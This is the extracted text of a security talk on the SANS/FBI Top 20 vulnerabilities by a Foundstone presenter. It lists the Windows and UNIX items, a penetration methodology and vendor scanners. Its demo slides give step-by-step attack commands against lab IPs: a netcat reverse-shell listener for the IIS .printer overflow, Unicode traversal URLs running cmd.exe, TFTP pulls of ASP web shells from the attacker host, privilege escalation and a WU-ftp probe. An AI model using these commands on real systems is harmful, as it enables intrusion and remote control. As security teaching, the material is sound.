8SANS/FBI Top 20 Vulnerabilities
Contents:
4 Overview
4 Methodology
and Exploits demo
(Windows/UNIX)
4 Products
Stephan Barnes
Foundstone
December 10, ISACA Dinner Meeting
1
8Overview of SANS/FBI Top 20
Contents:
4 The
State of Insecurity
4 The
List Facts
4A
Tale of Two Lists
4 Also
known by their nicknames
2
Number of Security Threats
The State of Insecurity
4
CERT handled 2x as many security
incidents in 2001 as in 2000
4
2001 had more than double the
vulnerabilities than 2000
4
In 2001, 2,437 software vulnerabilities
were discovered (CERT)
4
That’s more than 6 new vulnerabilities
per day!
4
325 of these were serious enough to
issue a public warning
“The $8 Billion
damage by Nimda
and Code Red
worm attacks
alone cost more
than all of the
security spending
after 9/11”
Network
Intrusions
Viruses
Hacking is like
Vegas – its a thrill
for many, its
addictive, its
costly, it doesn’t
care if you win or
loose, and it is
open for business
24/7/365
3
The SANS/FBI Top 20
4
The Top 20 is actually two Top 10 lists
•
Windows and UNIX
4
The “List” originally started with the NIPC and SANS then
evolved to be the SANS/FBI list
4
The MAJORITY of attacks come from a MINORITY of unpatched software vulnerabilities!
4
“80% of the RISK is represented by 20% of the
vulnerabilities”
•
Yes the “Bad Apple” concept is in effect!
4
TIME, and your wasting of it (in not patching systems), is
your biggest enemy
4
TIME is the hacker’s best chance
4
The List is “not an end all be all” insurance policy however
it’s a better than nothing approach
4
The (begin the long journey to the sea) List of Vulnerabilities
4
4
4
Who gives birth to the list?
• VA Vendors that are most respected and leading innovation
• About 250 Vulnerabilities are compiled
This is a special group of folks/thinkers
• Strong Security DNA!
Collectively their security knowledge spans many years
• Renaud De Raison – Nessus
• Gerhard Eschelbeck – Qualys
• Bob Todd – SARA
• Harold Toomey – Symantec
• Jamie Lau and Chris Klaus – ISS
• Dave Cole and John Bock – Foundstone
• Steve Christey – MITRE
•
•
4
Home of the CVE (Common Vulnerabilities and Exposures)
No VA tools but maintains the list CVE list and sanity
The group has a strong gene pool that helps insure your company’s internet survival
ability!
5
Who Refines the Vulnerability Framework Data?
4
A second group of about 45 people (Security Practitioners) from around the
world massage the 250 Vulnerabilities
4
This next group weeds out the best of the best (very Darwinian)
•
Ever talked to an evangelist?
•
This group lives, breaths, eats, sweats SECURITY daily!
4
From the 250 Vulnerabilities provided by the VA Group this group decides
which ones are the most notorious and make the lists
4
Once they whittle this group down they provide the list to SANS/FBI
4
SANS/FBI updates and broadcasts
4
The VA companies that have categories for just these vulnerabilities check
their products and modify their lists and products accordingly
4
As new Security Tsunami’s hit the lists are re-evaluated (modified if
necessary)
6
A “Tale of Two Lists”
Windows Systems
UNIX Systems
4W1 Internet Information Services (IIS)
4W2 Microsoft Data Access Components
4U1
(MDAC) -- Remote Data Services
4W3 Microsoft SQL Server
4W4 NETBIOS -- Unprotected Windows
Networking Shares
4W5 Anonymous Logon -- Null Sessions
4W6 LAN Manager Authentication -- Weak
LM Hashing
4W7 General Windows Authentication –
Accounts with No Passwords or Weak
Passwords
4W8 Internet Explorer
4W9 Remote Registry Access
4W10 Windows Scripting Host
Remote Procedure Calls (RPC)
4U2 Apache Web Server
4U3 Secure Shell (SSH)
4U4 Simple Network Management Protocol
(SNMP)
4U5 File Transfer Protocol (FTP)
4U6 R-Services -- Trust Relationships
4U7 Line Printer Daemon (LPD)
4U8 Sendmail
4U9 BIND/DNS
4U10 General Unix Authentication -Accounts with No Passwords or Weak
Passwords
7
The Windows List
4IIS:
(known by their more common names)
many call it … “It Isn’t Secure”, out of the box time bomb! Unicode, .printer, Buffer Overflows,
Rats nest! (We’ll be hacking our way through this tonight)
4MDAC:
Did you spend most of 2000-2001 trying to get this fixed? J we’re still finding holes.
4Microsoft
SQL Server: Didn’t I install a firewall and an IDS, what’s up with all of these things not
protecting the back end database. Credit Cards anyone?
4NetBIOS:
If you haven’t shut this off to the Internet by now you should probably leave the room
your probably not really in the game.
4Anonymous
Logon: Null Sessions – “share the world”
4Weak LAN Manager Authentication:
if you are an auditor and have not ran or heard of
L0phtCrack…well you might be in the wrong place J
4Accounts
with No Passwords or Weak Passwords: Administrator with No Password, etc.
Look out for your neighbor (ask me later)
4Internet
Explorer: one word – George Guninski. – Im sure Bill Gates would love to pull a Lee
Harvey Oswold on this guy
4Remote
Registry Access: this hurts when you do this wrong.
4Windows Scripting Host:
“I love you” – email VBS that date was a nightmare!
8
The UNIX List
(known by their more common names)
4Remote Procedure Calls:
(RPC): tooltalk, sadmind, mountd, statd – Buffer Overflows
(some old, some new, some borrowed, some blue)
4Apache Web Server:
“Well since IIS isn’t getting it done..” CGI (Come Get (me) Internet)
4Secure
Shell (SSH): ….sshhhh be quiet . . .sometimes it’s not secure
4Simple
Network Management Protocol (SNMP): (the MIB) is not a cool movie with guys in black,
it’s the message information block and it provides an avenue to attack
4File Transfer Protocol (FTP):
4R-Services
This exploit will really woo you! (wu-FTP)
-- Trust Relationships: remember this motto Friends… “Friends of Friends are not
always Friends”
4Line
Printer Daemon (LPD): such a simple task used for malicious purpose
4Sendmail:
read my email and execute this while you’re at it.
4BIND/DNS:
4Accounts
you’ll be in one if you don’t get this fixed
with No Passwords or Weak Passwords: You should know better
9
8Methodology/Exploits
Contents:
4 Methodology
4 Tools
4 Windows
Exploit
4 Countermeasures
4 UNIX
Exploit (time permitting)
4 Countermeasures
10
The Methodology we use at Foundstone
4
Footprint
4
Scan
4
Enumerate
4
Penetrate
4
Escalate
4
Pillage
4
Get Interactive
4
Expand influence
4
Cleanup
4
(Denial of Service)
We Wrote Them
11
Tools Available – (non commercial)
4
We will concentrate on the underlined tools to demo various hacks tonight
•
Everything here (except for the proprietary exploits) is available on the internet
•
Also check the Hacking Exposed site (www.hackingexposed.com)
4
Footprint – ARIN database, Sam Spade, SEC, WS_Ping ProPack
4
Scan – fscan, scanline, superscan, nmap, pinger, strobe,
4
Enumerate – netcat, dumpacl, dumpreg, epdump, NT Resource Kit
4
Penetrate – l0phtcrack, smbgrind, public/private exploits
4
Escalate – getadmin, john, netbus, netcat, pwdump2, sechole,
4
Pillage – teleport pro, weget
12
Windows Exploit – IIS Vulnerabilities
4We’ll
do a hacking demo tonight that will cover the Number 1 on the SANS/FBI
Top 20 for Windows:
4Buffer
overflows
4File System Traversal and script source revelation
4Privilege Escalation
4The
most effective way to compromise a Windows NT/2000 system is via
Internet Information Server (IIS)
4IIS
is installed by default, listens on TCP 80; many don’t realize it’s there and
vulnerable, you should
4Those
who run their Website on IIS can’t just block access to it Windows 2000
ships with IIS version 5 (IIS5)
13
Windows Exploit in IIS Part 1 - Buffer Overflow
4
Internet Printing Protocol (IPP) functionality is implemented in IIS 5 via an ISAPI filter
(C:\WINNT\System32\msw3prt.dll)
4
This functionality is enabled by default
4
Malformed requests for .printer files invoke this ISAPI and cause a buffer overflow,
resulting in remote SYSTEM privileges
4
4
Published exploits:
•
jill-win32.exe by dark spyrit (we’ll use jill-win32.exe)
•
Iis5hack.exe by hsj
How does it work:
•
Remotely exploits buffer overflow
•
inserts shellcode to “shovel a shell” back to a listener on attacker’s system
14
Windows Exploit in IIS Part 1 - Buffer Overflow
4Footprint
4Ping
to make sure you can reach it
Ping 10.1.1.2
•
4Scan
•
is done – you have a Victim
the victim with fscan
Fscan 10.1.1.2 (default ports will work)
4Enumerate
•
4We
the victim with netcat,
nc –v 10.1.1.2 80
see that the header is IIS 5.0
•
(probable victim)
4Penetrate
4Escalate
the victim with public/private exploits
privilege public/private public/private
exploits
15
Windows Exploit in IIS Part 1 - Buffer Overflow
4
How the hack works (Example Buffer Overflow in IPP)
4
Start netcat listener on the attacker:
nc –vv –l –p 3003 10.1.1.2
4
Execute jill-win32 on the attacker:
jill-win32 victim 80 attacker 3003
4
If this works correctly a shell pops up on attacker’s machine from the victim.
4
You are now in SYSTEM context on the victim
4
Local Hitch.. (we’ll see if you can figure it out)
16
Windows Exploit in IIS Part 1 - Buffer Overflow (review)
C:\>nc -vv -l -p 3003 10.1.1.2
listening on [any] 3003 ...
Run netcat listener on attacker’s machine
connect to [localhost] from VICTIM.COM
[ carriage return]
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
Remote command prompt from victim!
C:\WINNT\system32>whoami
whoami
[ carriage return]
Running with SYSTEM privileges!
NT AUTHORITY\SYSTEM
GAME OVER
17
Windows Exploit in IIS Part 2 – File System Traversal
4
Same Victim (Unicode Exploit)
4
http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir
4
http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+..\
4
http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+..\..\
4
Browse away! View the contents of the directory because of UNICODE
patch not applied
4
•
IIS decodes Unicode after path checking, not before
•
The representations for “/” is %c0%af
WHY? Because Users of IIS are automatically given access rights
associated with IUSR_macinename user account. The
IUSR_machinname account is a member of “everyone” and “users”
groups by default. Any file on the same logical drive and any webaccessible file that is accessible to these groups can be deleted,
modified or executed
4
Covered in MS00-078 and MS00-057
18
Windows Exploit in IIS Part 3 – Privilege Escalation (begin)
4
Same Victim (we will use the Unicode Exploit to shovel our goods up to the victim)
4
We will use our local TFTP and the victims TFTP
4
Start TFTP on attacker (configure appropriately)
4
Use Victim to TFTP up cmdasp.asp
4
http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+tftp+-i+10.1.1.1+GET+cmdasp.asp+cmdasp.asp
•
You may get an error that the command didn’t return surf back to the scripts directory using the Unicode exploit
4
Use Victim to run cmdasp.asp to test
4
http://10.1.1.2/scripts/cmdasp.asp
4
Now you have a nice remote command processor
4
Type any command and see!
4
Hang on we’re just getting started!
19
Windows Exploit in IIS Part 3 – Privilege Escalation (continued)
4
Same Victim (we will use the Unicode Exploit to shovel our goods up to the victim)
4
We will use our local TFTP and the victims TFTP again
4
TFTP is started on attacker (configure appropriately)
4
Use Victim to TFTP upload upload.asp and upload.inc
•
http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+tftp+-i+10.1.1.1+GET+upload.asp+upload.asp
•
You can recheck that it made it using Unicode or your brand new command remote processor
•
•
(http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir)
http://10.1.1.2/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+tftp+-i+10.1.1.1+GET+upload.inc+upload.inc
4
http://10.1.1.2/scripts/upload.asp
4
Now you have a nice remote file uploader
4
Send up the goods
4
Send up whoami.exe (you’ll need this)
20
Windows Exploit in IIS Part 3 – Privilege Escalation (end)
4
Run whoami via cmdasp
4
You can see we are the IUSR
4
Goal is to become part of the ADMIN
group
4
Using the uploader upload idq.dll
•
May get that pesky error msg again that the page may
not be displayed Ignore that!
4
Run net localgroup administrators via
cmdasp
•
4
You are now part of the ADMIN group!
Do I need to go any further?
21
Countermeasures to protect IIS
There are many but in general
Un-MAP unused extensions in IIS that are not used
and HARDEN and PATCH everything and often
If you don’t use:
Remove this entry:
Web-based password reset
.htr
Internet Database Connector
.idc
Server-side Includes
.stm, .shtm, .shtml
Internet Printing
.printer
Index Server
.htw, .ida and .idq
22
UNIX Exploit - WU
WU--ftp (time permitting)
4Washington
University (WU-ftp is ) One of the most widely
used FTP’s
4Can
4Is
be installed on a large variety of UNIX systems
not hard to determine if vulnerable
4Login
anonymously
4Type:
ls ~{
4(If
4It
it closes the connection then it’s vulnerable)
is a Heap Corruption Vulnerability
4Different
section of memory
23
Countermeasures to protect WU-ftp
4Possibly
consider other FTP programs than Washington
University (WU-ftp)
4If
you are running it get as close to current patch level
24
8Products: SANS/FBI Top 20
Contents:
4 Products
4 FoundScan
Demo
25
Tools and Services that Check for the Top 20
4
Qualys: QualysGaurd
4
Harris: STAT Scanner
4
ISS: Internet Scanner
4
SAINT Corporation
4
Advanced Research Corp: SARA
4
Nessus: Nessus Security Scanner
4
Foundstone: FoundScan
•
Demo on Victims if time
26
Contact
4
4
4
Foundstone
•
27201 Puerta Real, Mission Viejo, CA 92691
•
949-297-5600
Stephan Barnes
•
VP of the Western Region, 949-297-5590
•
[email protected], [email protected]
•
http://www.m4phr1k.com (war dialing site)
Professional Services (including private training)
•
4
FoundScan
•
4
[email protected] or [email protected]
[email protected]
Training (Public)
•
Available at www.foundstone.com in the education section
27
Leave No Stone Unturned…
28
© Copyright 2025 Paperzz